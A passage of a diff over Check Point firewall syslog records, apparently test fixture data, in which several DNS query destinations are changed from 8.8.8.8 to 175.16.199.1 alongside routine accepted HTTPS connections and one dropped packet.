s_port:"41324"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80ddf2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38708"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503730"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45599"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503730"; layer_name:"Network"; 
layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41324"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf2,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.100.50.51"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36846"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40170"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; 
loguid:"{0x5e80ddf4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60027"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50441"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; 
match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40170"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60027"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50441"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x3,0x353707c7,0xee78a1dc}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.21"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59166"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.42.157"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33196"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:12Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf4,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503732"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60202"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddf5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38655"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58757"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35619"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58757"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503733"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35619"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddf5,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35156"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10107"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:42:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddf5,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46553"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80ddf6,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53770"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
-<134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503734"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46371"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503734"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56990"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503734"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46371"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503734"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56990"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58686"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddfa,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"13.48.233.241"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58834"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddfa,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38127"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:42:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ddfa,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38127"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
